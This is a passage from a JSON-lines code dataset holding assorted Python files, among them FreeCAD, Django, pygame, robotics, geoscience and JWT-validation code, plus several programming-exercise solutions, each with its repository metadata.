True\n\nbbox = p.Shape.BoundBox\nplc = App.Placement(\n App.Vector(\n -(bbox.XMin + bbox.XMax)/2,\n -bbox.YMin,\n -(bbox.ZMin + bbox.ZMax)/2,\n ),\n App.Rotation(App.Vector(0,0,1),0)\n)\nplc = App.Placement(\n App.Vector(0, -40, 0),\n App.Rotation(App.Vector(1,0,0),90)\n).multiply(plc)\np.Placement = plc\n\npp.append(p)\n\nif 0:\n rycp = App.ActiveDocument.addObject('PartDesign::FeatureBase','rycp_base')\n rycp.BaseFeature = p\n plc = App.Placement(\n App.Vector(0, 80, 0),\n App.Rotation(App.Vector(1,0,0),0)\n ).multiply(p.Placement)\n rycp.Placement = plc\n\n pp.append(rycp)\n\nheated_plate = App.ActiveDocument.addObject(\"Part::Box\", \"HeatedPlate_base\")\nheated_plate.Length = \"200 mm\"\nheated_plate.Width = \"200 mm\"\nheated_plate.Height = \"3 mm\"\nheated_plate.Placement = App.Placement(\n App.Vector(-100, -100, -3),\n #App.Vector(0, 0, -3),\n App.Rotation(App.Vector(0,0,1),0)\n)\nif heated_plate.ViewObject:\n heated_plate.ViewObject.Visibility = True\n\nprint(heated_plate.Shape.BoundBox)\n\nimport Mesh\nMesh.export(pp,f\"{workdir}/{part}.stl\")\n","repo_name":"sevikkk/valurap","sub_path":"freecad/print_fixture.py","file_name":"print_fixture.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15597747470","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass Subject(models.Model):\n\n class SubjectName(models.TextChoices):\n MATH = 'MATH', _('MATH')\n ENGLISH = 'ENGLISH', _('ENGLISH')\n HISTORY = 'HISTORY', _('HISTORY')\n name = models.CharField(\n max_length=30,\n choices=SubjectName.choices,\n default=SubjectName.MATH,\n help_text='과목',\n )\n teachers = models.ManyToManyField(\n 'time_tables.Teacher',\n related_name='teacher_subjects',\n )\n\n def __str__(self):\n return self.name\n","repo_name":"baobab-man/django-school-system","sub_path":"time_tables/models/subject.py","file_name":"subject.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25162919404","text":"# ========================\n# Information\n# ========================\n\n# Direct Link: https://www.hackerrank.com/challenges/30-running-time-and-complexity/problem\n# Difficulty: Medium\n# Max Score: 30\n# Language: Python\n\n# ========================\n# Solution\n# ========================\n\n# Note: 1 is NOT a prime number, that is, a number divisable by another number less or equal to the square root of the first number, it is NOT prime\n\nfor _ in range(int(input())):\n num = int(input())\n if num == 1:\n print(\"Not prime\")\n else:\n if(num % 2 == 0 and num > 2):\n print(\"Not prime\")\n else:\n for i in range(3, int(num**(1/2))+1, 2):\n if num % i == 0:\n print(\"Not prime\")\n break\n else:\n print(\"Prime\")\n","repo_name":"nathan-abela/HackerRank-Solutions","sub_path":"30 Days of Code/Python/26 - Day 25 - Running Time and Complexity.py","file_name":"26 - Day 25 - Running Time and Complexity.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":388,"dataset":"github-code","pt":"19"} +{"seq_id":"70216389805","text":"n = int(input())\r\ntr = []\r\nfor _ in range(n):\r\n a = list(map(int, input().split()))\r\n tr.append(a)\r\n\r\nfor i in range(n):\r\n for j in range(i+1):\r\n if i == 0:\r\n tr[i][j] = tr[i][j]\r\n continue\r\n if j == 0:\r\n up = tr[i-1][0]\r\n tr[i][j] += tr[i-1][0]\r\n continue\r\n if j == i :\r\n left = tr[i-1][j-1]\r\n tr[i][j] += tr[i-1][j-1]\r\n continue\r\n\r\n else:\r\n up_left = tr[i-1][j-1]\r\n up_right = tr[i-1][j]\r\n tr[i][j] += max(up_left, up_right)\r\n\r\nresult = 0\r\nfor j in range(n):\r\n result = max(result, tr[n-1][j])\r\nprint(result)","repo_name":"yeni28/Algorithm","sub_path":"백준/Silver/1932. 정수 삼각형/정수 삼각형.py","file_name":"정수 삼각형.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37056109251","text":"import os\n\nfrom django.urls import reverse_lazy\nfrom dotenv import load_dotenv\nfrom pathlib import Path # python3 only\nenv_path = Path('.') / '.env'\nload_dotenv(dotenv_path=env_path)\n\nBASE_DIR = os.path.dirname(os.path.dirname((os.path.dirname(os.path.abspath(__file__)))))\n\nADMINS = [('Admin', )]\nMANAGERS = ADMINS\nAUTH_USER_MODEL = 'users.User'\n\nSECRET_KEY = os.getenv('SECRET_KEY', 'very_secret_key')\n\nALLOWED_HOSTS = [\"\"]\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, 'static'),\n]\n\n# Django-registration-redux\nACCOUNT_ACTIVATION_DAYS = 1\nSITE_ID = 1\n\nLOGIN_URL = reverse_lazy('authy:login')\nLOGIN_REDIRECT_URL = reverse_lazy('accounts:profile')\nLOGOUT_REDIRECT_URL = reverse_lazy('index')\n\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\n\n# Google ReCaptcha keys (and their TEST keys as default values)\nRECAPTCHA_PUBLIC_KEY = os.getenv('RECAPTCHA_PUBLIC_KEY', '6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI')\nRECAPTCHA_PRIVATE_KEY = os.getenv('RECAPTCHA_PRIVATE_KEY', '6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe')\nSILENCED_SYSTEM_CHECKS = ['captcha.recaptcha_test_key_error']\n\n# Required by django-registration-redux\nINCLUDE_REGISTER_URL = False\nINCLUDE_AUTH_URLS = False\n# REGISTRATION_OPEN = False # Disables registering of new users\n\nGENERATE_DUMMY_LISTING = True\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n# CELERY related settings\nCELERY_BROKER_URL = os.getenv('CELERY_BROKER_URL', 'redis://localhost:6379')\n# CELERY_RESULT_BACKEND = os.getenv('CELERY_BROKER_URL', 'redis://localhost:6379')\nCELERY_RESULT_BACKEND = 'django-db' # django-celery-results\nCELERY_ACCEPT_CONTENT = ['application/json']\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_TASK_SERIALIZER = 'json'\n\n# This is the main setting for triggering Celery. It is inherited in the local.py and production.py settings\n# CELERY_TASK_ALWAYS_EAGER = True\n\n# https://docs.celeryproject.org/en/stable/django/first-steps-with-django.html#extensions\n\nINSTALLED_APPS = [\n # Django apps\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.humanize',\n 'django.contrib.sites',\n 'registration', # django-registration-redux, needs to be at this position\n 'django.contrib.admin',\n\n # Third party libraries\n 'storages',\n 'django_filters',\n 'captcha',\n 'widget_tweaks',\n # Celery libraries\n 'django_celery_results',\n 'django_celery_beat',\n\n # Local apps\n 'authy',\n 'users',\n 'listings',\n 'searchprofiles',\n 'reports',\n 'api',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'najdistandjango30.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'users.context_processors.add_project_name'\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'najdistandjango30.wsgi.application'\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Amsterdam'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n","repo_name":"DonExo/NajdistanDjango3.0","sub_path":"najdistandjango30/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14614813724","text":"import numpy as np\nimport perplexfugacitydata as pf\n\n# match Stolper fig 3 @ 1373 K?\nT_iso = 1373\np_min, p_max = 1e4, 4e4\nT_min, T_max = 1372.5, 1900.5 # endpoint can't equal T_of_interest\n\nX_ferric = 0.1\ncore_eff = 0.88\n# output_sub = 'hypatia_' + str(int(core_eff * 100)) + 'coreeff_' + str(int(X_ferric * 100)) + 'ferric/'\noutput_sub = 'X_ferric_tests/'\noutput_parent_path = pf.output_parent_default + output_sub\nperplex_path = '/home/claire/Works/perple_x/'\n\n# # # # only need to run this once to get build files (i.e., bulk composition) and vertex output files\n# # # note this will first download the stellar composisions for the whole sample and then run perple_x\n# pfug.fo2_from_hypatia(p_min, p_max, n_sample=3, T_min=T_min, T_max=T_max, isotherm=T_iso,\n# X_ferric=X_ferric, core_efficiency=core_eff, planet_kwargs={'Tp': 999},\n# #solve_interior=False, --> already a parameter\n# check_comp=True, suppress_output=False, run=True, verbose=True,\n# output_parent_path=output_parent_path, perplex_path=perplex_path,\n# mu0_file='data_tables/mu_o2_standard.tab', compare_buffer='qfm',\n# use_local_compositon=False,\n# # use_local_composition=True, existing_dir='hypatia88Fe', # try local first\n# # restart='2MASS 23155829+3127462'\n# )\n\n# # can (re)do fo2 calculations with this using existing vertex files\n# pfug.fo2_from_local(output_parent_path=output_parent_path, mu0_file='data_tables/mu_o2_standard.tab',\n# compare_buffer='qfm', check_comp=True, suppress_output=False, isotherm=T_iso)\n#\n\n# # do solar and Earth\n# for (name, test_oxides, star) in zip(['dmm', 'sun_88Fe'], [pfug.wt_oxides_DMM, None], [None, 'sun']):\n# pfug.fo2_from_oxides(name=name, p_min=p_min, p_max=p_max, T_min=T_min, T_max=T_max, test_oxides=test_oxides,\n# X_ferric=X_ferric, isotherm=T_iso, core_efficiency=core_eff, star=star,\n# run=True, compare_buffer='qfm',\n# suppress_output=False, check_comp=True, verbose=True,\n# mu0_file='data_tables/mu_o2_standard.tab', output_parent_path=pfug.output_parent_px,\n# )\n\n\n# # # like Stolper\n# pfug.fo2_from_oxides(name='Stolper', p_min=p_min, p_max=p_max, T_min=T_min, T_max=T_max, test_oxides=pfug.wt_oxides_DMM_ext,\n# X_ferric=0.031, isotherm=T_iso,\n# run=True, compare_buffer='qfm',\n# suppress_output=False, check_comp=True, verbose=True,\n# mu0_file='data_tables/mu_o2_standard.tab', output_parent_path=pfug.output_parent_px,\n# )\n\n\n# test effect of X_ferric on mineral phases\nfor (name, X_ferric) in zip(['dmm_10', 'dmm_03'], [0.1, 0.03]):\n pf.fo2_from_oxides(name=name, p_min=p_min, p_max=p_max, T_min=T_min, T_max=T_max, test_oxides=pf.wt_oxides_DMM,\n X_ferric=X_ferric, isotherm=T_iso, core_efficiency=core_eff, star=None,\n run=True, compare_buffer='qfm',\n suppress_output=False, check_comp=True, verbose=True,\n mu0_file='data_tables/mu_o2_standard.tab', output_parent_path=pf.output_parent_default,\n )","repo_name":"clairesworld/rocky-water","sub_path":"py/minfo2/old_oxygen_fugacity_calc_local.py","file_name":"old_oxygen_fugacity_calc_local.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1383354819","text":"import xml.etree.cElementTree as ET\n\n#Parses file and corrects the not expected zip keys\n#Args: \n #osmfile: OpenStreetMap data\n #mapping: mapping dict with the problem types and the write ones\n#Returns: street_types: A dict with the problem street types\n \nOSMFILE = \"rj_map.osm\"\n\nmapping = { \n \"CEP_LD\": \"zip:right\",\n \"CEP_LE\": \"zip:left\",\n \"cep:par\": \"zip:right\",\n \"cep:impar\": \"zip:left\",\n \"addr:zipcode\": \"addr:postcode\"\n }\n\ndef audit(osmfile):\n #Parses file and calls audit_street_type function\n #Args: osmfile: OpenStreetMap data\n #Returns: street_types: A dict with the problem street types\n osm_file = open(osmfile, \"r\")\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\n if elem.tag == \"node\" or elem.tag == \"way\":\n for tag in elem.iter(\"tag\"):\n update_tags(tag, mapping)\n osm_file.close()\n\n\ndef update_tags(tag, mapping):\n postal_tag = tag.attrib['k']\n if tag.attrib['k'] in mapping:\n postal_tag = mapping[tag.attrib['k']] \n return postal_tag \n\naudit(OSMFILE)\n","repo_name":"danicastroaraujo/OpenStreetMap-DataWrangling","sub_path":"Similar_Tags.py","file_name":"Similar_Tags.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10092106084","text":"from utils import distance\nfrom Stop import Stop\nimport numpy as np\n\nclass MoveDistance(object):\n def __init__(self, rover, dist, target_vel=2):\n self.rover = rover\n self.dist = dist\n self.target_vel = target_vel\n self.throttle = 0.2 * np.sign(target_vel)\n # Whether the rover has reached the target distance\n self.is_done = False\n # Whether this is the first time run() has been called\n self.is_first_run = True\n # Counter to keep track of how long the rover has not moved\n self.not_moved_counter = 0\n\n\n def run(self):\n # Increment not_moved_counter if the rover is not moving\n if abs(self.rover.vel) < 0.2:\n self.not_moved_counter += 1\n else:\n self.not_moved_counter = 0\n\n\n self.rover.steer = 0\n #If this is the first time run() is called, store the rover's initial position\n if self.is_first_run:\n self.start_pos = self.rover.pos\n self.is_first_run = False\n\n # Check if the rover has reached the target distance\n if not self.is_done and distance(self.rover.pos, self.start_pos) >= self.dist:\n self.is_done = True\n\n# If the rover has reached the target distance, set brake to 1 and throttle to 0\n if self.is_done:\n self.rover.brake = 1\n self.rover.throttle = 0\n# If the rover's velocity is below the target velocity, set brake to 0 and throttle to the specified value\n elif abs(self.rover.vel) < abs(self.target_vel):\n self.rover.brake = 0\n self.rover.throttle = self.throttle\n# If the rover's velocity is equal to or above the target velocity, set throttle to 0\n else:\n self.rover.throttle = 0\n\n\n def next(self):\n# If the rover has reached the target distance and is not moving, return None to indicate that this behavior is finished\n if self.is_done and abs(self.rover.vel) < 0.2:\n return None\n# If the rover has not reached the target distance, but is not moving and the throttle is not 0, return None\n# (This indicates that the rover is stuck and cannot move)\n elif not self.is_done and abs(self.rover.vel) < 0.2 and abs(self.rover.throttle) > 0 and self.not_moved_counter > 80:\n return None\n else:\n return self\n","repo_name":"HossamHammam/Rover_Vision","sub_path":"code/MoveDistance.py","file_name":"MoveDistance.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"795487480","text":"import pygame\r\nfrom settings import *\r\nfrom pygame.image import load\r\n\r\nclass Menu:\r\n def __init__(self):\r\n self.display_surface = pygame.display.get_surface()\r\n self.create_data() # Import data of tiles, needs to be before the buttons, because we need the data to make the buttons properly\r\n self.create_buttons() # Call the method to create buttons\r\n\r\n # Importing items\r\n def create_data(self):\r\n self.menu_surfaces = {}\r\n # Iterate through each key:value pair in the editor data dictionary\r\n for key, value in EDITOR_DATA.items():\r\n # If the value inside of the value \"menu\" has a value i.e not \"None\"\r\n if value[\"menu\"]:\r\n # If this value isn't already in the self.menu_surfaces dictionary\r\n if not value[\"menu\"] in self.menu_surfaces:\r\n self.menu_surfaces[value[\"menu\"]] = [(key, load(value[\"menu_surf\"]))]\r\n # In case that they both have \"terrain\" for example as the value[\"menu\"], the \"water\" surface would be ignored without this second condition\r\n else:\r\n self.menu_surfaces[value[\"menu\"]].append((key, load(value[\"menu_surf\"])))\r\n\r\n # Change self.index to change items\r\n def click(self, mouse_pos, mouse_button):\r\n for sprite in self.buttons:\r\n if sprite.rect.collidepoint(mouse_pos):\r\n # Check for different mouse clicks\r\n if mouse_button[1]: # Middle mouse click\r\n sprite.main_active = not sprite.main_active if sprite.items[\"alt\"] else True # Turn main_active on/off only if the button has alternative items\r\n if mouse_button[2]: # Right click\r\n sprite.switch()\r\n\r\n return sprite.get_id()\r\n\r\n def create_buttons(self):\r\n # Menu area\r\n size = 180\r\n margin = 6\r\n topleft = (WINDOW_WIDTH - size - margin, WINDOW_HEIGHT - size - margin)\r\n self.rect = pygame.Rect(topleft, (size, size))\r\n\r\n # Button area\r\n generic_button_rect = pygame.Rect(self.rect.topleft, (self.rect.width / 2, self.rect.height / 2))\r\n button_margin = 5\r\n self.tile_button_rect = generic_button_rect.copy().inflate(-button_margin, -button_margin) # Inflate increases or decreases the size of the rectangle, parameters are x and y\r\n self.coin_button_rect = generic_button_rect.move(self.rect.width / 2, 0).inflate(-button_margin, -button_margin) # The move method returns a new rect object\r\n\r\n self.enemy_button_rect = generic_button_rect.copy().move(0, self.rect.height / 2).inflate(-button_margin, -button_margin)\r\n self.palm_button_rect = generic_button_rect.move(self.rect.width / 2, self.rect.height / 2).inflate(-button_margin, -button_margin) \r\n\r\n # Create the buttons\r\n self.buttons = pygame.sprite.Group()\r\n Button(rect = self.tile_button_rect, group = self.buttons, items = self.menu_surfaces[\"terrain\"]) # First button\r\n Button(rect = self.coin_button_rect, group = self.buttons, items = self.menu_surfaces[\"coin\"])\r\n Button(rect = self.enemy_button_rect, group = self.buttons, items = self.menu_surfaces[\"enemy\"])\r\n Button(rect = self.palm_button_rect, group = self.buttons, items = self.menu_surfaces[\"palm fg\"],items_alt = self.menu_surfaces[\"palm bg\"])\r\n\r\n # Highlights the currently selected button\r\n def highlight_indicator(self, index):\r\n if EDITOR_DATA[index][\"menu\"] == \"terrain\":\r\n pygame.draw.rect(self.display_surface, BUTTON_LINE_COLOUR, self.tile_button_rect.inflate(4, 4), 5, 4) # Last parameter is border rounding\r\n if EDITOR_DATA[index][\"menu\"] == \"coin\":\r\n pygame.draw.rect(self.display_surface, BUTTON_LINE_COLOUR, self.coin_button_rect.inflate(4, 4), 5, 4) # Last parameter is border rounding\r\n if EDITOR_DATA[index][\"menu\"] == \"enemy\":\r\n pygame.draw.rect(self.display_surface, BUTTON_LINE_COLOUR, self.enemy_button_rect.inflate(4, 4), 5, 4) # Last parameter is border rounding\r\n if EDITOR_DATA[index][\"menu\"] in (\"palm bg\", \"palm fg\"): # Check if the value selected is either in palm bg or palm fg\r\n pygame.draw.rect(self.display_surface, BUTTON_LINE_COLOUR, self.palm_button_rect.inflate(4, 4), 5, 4) # Last parameter is border rounding \r\n\r\n def display(self, index):\r\n # pygame.draw.rect(self.display_surface, \"red\", self.rect)\r\n # pygame.draw.rect(self.display_surface, \"green\", self.tile_button_rect)\r\n # pygame.draw.rect(self.display_surface, \"blue\", self.coin_button_rect)\r\n # pygame.draw.rect(self.display_surface, \"yellow\", self.enemy_button_rect)\r\n # pygame.draw.rect(self.display_surface, \"brown\", self.palm_button_rect)\r\n\r\n self.buttons.update()\r\n self.buttons.draw(self.display_surface)\r\n self.highlight_indicator(index)\r\n \r\n\r\nclass Button(pygame.sprite.Sprite): \r\n # Items = foreground palm trees items_alt = background palm trees\r\n def __init__(self, rect, group, items, items_alt = None): # group = the group that this button sprite is part off\r\n super().__init__(group) \r\n self.image = pygame.Surface(rect.size) # Will be a plain surface with the size of the button rectangle(created above)\r\n self.rect = rect\r\n\r\n # Items\r\n self.items = {\"main\": items, \"alt\": items_alt}\r\n self.index = 0 # Determines the item we are looking at\r\n self.main_active = True # Determines whether we are looking at the main items or alternative items\r\n\r\n # Get the id (the self.index)\r\n def get_id(self):\r\n return self.items[\"main\" if self.main_active else \"alt\"][self.index][0] # If self.main is active, we return items or items_alt\r\n \r\n # Switch index \r\n def switch(self):\r\n self.index += 1\r\n # Limit the index\r\n \"\"\" Set self.index to 0 if the self.index exceeds the number of items inside main or alt. If it hasn't exceeded, don't make any changes to self.index.\r\n This means that if terrain had 3 items. After the 3rd item, it will loop back to the 1st item\r\n \"\"\"\r\n self.index = 0 if self.index >= len(self.items[\"main\" if self.main_active else \"alt\"]) else self.index \r\n\r\n # Display what we have inside of the sprite\r\n def update(self):\r\n # Fill the background of the button with this colour\r\n self.image.fill(BUTTON_BG_COLOUR)\r\n surface = self.items[\"main\" if self.main_active else \"alt\"][self.index][1] # The graphic of the surface tuple\r\n #print(surface)\r\n rect = surface.get_rect(center = (self.rect.width / 2, self.rect.height / 2))\r\n # Draw the image icon onto the button box\r\n self.image.blit(surface, rect)\r\n\r\n","repo_name":"LyleW473/Pygame-tutorials","sub_path":"Clear Code/Mario Maker/code/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72866765860","text":"# 두 용액 ( 메모리 초과 )\n# 두 포인터 사용했지만 재귀가 깊어저 메모리 초과가 된 것으로 보임\n\nimport sys\nsys.setrecursionlimit(10**6)\n\nn = int(input())\narr = list(map(int,input().split()))\narr.sort()\n\ndef check(i,j):\n global answer, answer_list\n if i == j:\n return\n \n temp = arr[i] + arr[j]\n\n if abs(temp) < answer:\n answer = temp\n answer_list = [arr[i],arr[j]]\n\n if temp > 0:\n check(i,j-1)\n elif temp < 0:\n check(i+1,j)\n else:\n return\n\nif arr[-1] <= 0:\n print(arr[-1],arr[-2])\nelif arr[0]>= 0:\n print(arr[0],arr[1])\nelse:\n answer = 2000000000\n answer_list = []\n check(0,n-1)\n print(answer_list)\n\n\n\n\n\n\n","repo_name":"junsun10/baekjoon","sub_path":"23_08/23_08_05w/2470.py","file_name":"2470.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"69876742820","text":"#Sum of a sequence\nwhile True:\n q = input(\"Do you want to calculate sum? (Y/N): \").lower()\n if(q==\"y\"):\n s = []\n sum=0\n print(\"Enter numbers:\")\n while True:\n try:\n x = int(input())\n s.append(x)\n if(x==0):\n break\n except ValueError:\n print(\"Invalid input, please reenter\")\n for i in s:\n sum+=i\n print(\"Sum:\",sum)\n else:\n break\n\n#Education Level\ntry:\n a = int(input(\"Enter age: \"))\n if(a<=0):\n raise ValueError\n elif(a<5):\n print(\"Too young to study\")\n elif(a==5):\n print(\"Go to Kindergarten\")\n elif(a>17):\n print(\"Go to college\")\n else:\n print(\"Go to Grade\",a-5)\nexcept ValueError:\n print(\"Invalid Age\")\n \n#get permutations of a given string\nperms = []\ndef permutate(l, b1, b2):\n if b1 == b2:\n perms.append(\"\".join(l))\n else:\n for x in range(b1, b2 + 1):\n l[x], l[b1] = l[b1], l[x]\n permutate(l, b1 + 1, b2)\n l[x], l[b1] = l[b1], l[x]\n\ns = input(\"Enter a string to permutate : \")\npermutate(list(s), 0, len(s) - 1)\nprint(\"The permutations of\",s,\"are:\")\nfor i in perms:\n print(i)\n \n ","repo_name":"apurvaumredkar/Object-Oriented-Programming-Lab","sub_path":"expt 8 - exception handling.py","file_name":"expt 8 - exception handling.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10191931862","text":"from flask import request\nfrom flask import Response\nimport jwt\nfrom jwksutils import rsa_pem_from_jwk\nimport json\nimport requests\nimport base64\n\n# https://robertoprevato.github.io/Validating-JWT-Bearer-tokens-from-Azure-AD-in-Python/\n\njwks = {}\n\nvalid_audiences = [] # id of the application prepared previously\nissuer = 'https://sts.windows.net/9885457a-2026-4e2c-a47e-32ff52ea0b8d/'\n\n\nclass InvalidAuthorizationToken(Exception):\n def __init__(self, details):\n super().__init__('Invalid authorization token: ' + details)\n\n# jwt.get_unverified header goes away in PyJWT 1.7.x\ndef getUnverifiedHeader(token):\n jwts = token.split('.')\n return json.loads( base64.b64decode(jwts[0]+'==').decode(\"utf-8\") )\n\ndef get_jwt_value(token, key):\n headers = getUnverifiedHeader(token) #jwt.get_unverified_header(token) \n if not headers:\n raise InvalidAuthorizationToken('missing headers')\n try:\n return headers[key]\n except KeyError:\n raise InvalidAuthorizationToken('missing ' + key)\n\ndef get_kid(token):\n headers = getUnverifiedHeader(token) #jwt.get_unverified_header(token)\n if not headers:\n raise InvalidAuthorizationToken('missing headers')\n try:\n return headers['kid']\n except KeyError:\n raise InvalidAuthorizationToken('missing kid')\n\ndef get_alg(token):\n headers = getUnverifiedHeader(token) #jwt.get_unverified_header(token)\n if not headers:\n raise InvalidAuthorizationToken('missing headers')\n try:\n return headers['alg']\n except KeyError:\n raise InvalidAuthorizationToken('missing alg')\n\ndef get_jwk(kid):\n for jwk in jwks['keys']:\n if jwk['kid'] == kid:\n return jwk\n raise InvalidAuthorizationToken('kid not recognized')\n\ndef get_public_key(token):\n return rsa_pem_from_jwk( get_jwk( get_kid(token) ) )\n\ndef validate_jwt(jwt_to_validate):\n alg = get_alg(jwt_to_validate) # RS256\n public_key = get_public_key(jwt_to_validate)\n\n jwt_decoded = jwt.decode(jwt_to_validate,\n public_key,\n verify=True,\n algorithms=[alg],\n audience=valid_audiences,\n issuer=issuer)\n\n # do what you wish with decoded token:\n # if we get here, the JWT is validated\n return jwt_decoded\n\ndef initWellKnownConfig( urlWellKnown ):\n global issuer \n # get the well known info & get the public keys\n resp = requests.get(url=urlWellKnown)\n well_known_openid_config_data = resp.json()\n jwks_uri = well_known_openid_config_data['jwks_uri']\n issuer = well_known_openid_config_data['issuer']\n # get the discovery keys\n resp = requests.get(url=jwks_uri)\n jwks.update( resp.json() )\n \ndef initAzureAD( tenantId, clientId ):\n global issuer \n global valid_audiences\n valid_audiences.append( clientId )\n initWellKnownConfig( 'https://login.microsoftonline.com/' + tenantId + '/v2.0/.well-known/openid-configuration' )\n issuer = \"https://sts.windows.net/\" + tenantId + \"/\"\n\ndef initAuthority( wellKnownMetadataEndpoint, clientId ):\n global issuer \n valid_audiences.append( clientId )\n initWellKnownConfig( wellKnownMetadataEndpoint )\n\ndef checkAuthorization(requiredScopes=None):\n # Authorization: Bearer AbCdEf123456\n accessKeyName = \"Authorization\"\n passedAccessKey = \"\"\n if accessKeyName in request.headers:\n passedAccessKey = request.headers[accessKeyName]\n\n if not passedAccessKey.startswith(\"Bearer \"):\n msg = {\"message\" : 'Unauthorized. No or wrong token received in request'}\n return None, Response( json.dumps(msg), status=401, mimetype='application/json')\n\n jwt_decoded = None \n try:\n jwt_decoded = validate_jwt( passedAccessKey[7:] )\n except Exception as ex:\n msg = {\"message\" : 'Unauthorized. Token is invalid. ' + ex.args[0] }\n return None, Response( json.dumps(msg), status=401, mimetype='application/json')\n else:\n if requiredScopes is not None and len(requiredScopes) > 0:\n jwtScopes = jwt_decoded['scp'].split()\n if not requiredScopes in jwtScopes:\n msg = {\"message\" : 'Unauthorized. Required scope(s) missing: ' + requiredScopes}\n return None, Response( json.dumps(msg), status=403, mimetype='application/json')\n\n return jwt_decoded, None\n","repo_name":"cljung/py-rest-api","sub_path":"jwtvalidator.py","file_name":"jwtvalidator.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"70761925542","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nHEADER_LINES = 5\nFILE_NAME = 'testing/1kHzcenter5ftT1.txt'\nampLeft = []\nampRight = []\ntime = []\n\n# read from file, store values\nwith open(FILE_NAME, 'r') as f:\n for i in range(HEADER_LINES):\n next(f)\n for line in f:\n try:\n row = line.rstrip('\\n')\n row = row.split('\\t')\n time.append(float(row[0]))\n ampLeft.append(float(row[1]))\n ampRight.append(float(row[3]))\n # print(rw.split('\\t'))\n except IndexError:\n pass\n\n# from MATLAB code\n\n# Physical Values\nIN2M = 0.0254 # inches to meter conversion\nc = 340.0 # m/s\nd = 6*IN2M # m\nfs = 48000 # Hz\nts = 1.0/fs\nN = 10\nmaxTau = d/c\niStart = 0 # 0 instead of 1\nsampWindow = int(maxTau/ts)\niStop = iStart + sampWindow # don't subtract 1, want 21 elements to match MATLAB code\n\n# main loop\nthetaMax = np.zeros(N)\n\nwhile iStop < len(ampLeft):\n al = ampLeft[iStart:iStop]\n alhl = al\n ar = ampRight[iStart:iStop]\n arhl = ar\n\n for i in range(len(arhl)):\n # left\n if alhl[i] >= 0:\n alhl[i] = 1\n else:\n alhl[i] = -1\n # right\n if arhl[i] >= 0:\n arhl[i] = 1\n else:\n arhl[i] = -1\n\n L = len(al) + len(ar) - 1\n\n theta = np.linspace(-90, 90, L)\n\n x = np.correlate(arhl, alhl, 'full')\n\n s = np.linspace(-L/2, L/2, L)\n\n iMax = x.argmax(axis=0)\n\n tauHat = s[iMax] * ts\n tauHat_ms = tauHat/(0.001)\n dist_inch = tauHat_ms * 0.001 * 340 * 39\n thetaHat = theta[iMax]\n thetaMax[0:N-1] = thetaMax[1:]\n thetaMax[N-1] = thetaHat\n thetaHat = np.mean(thetaMax)\n\n iStart = iStop\n iStop = iStart + sampWindow - 1\nplt.plot(theta, 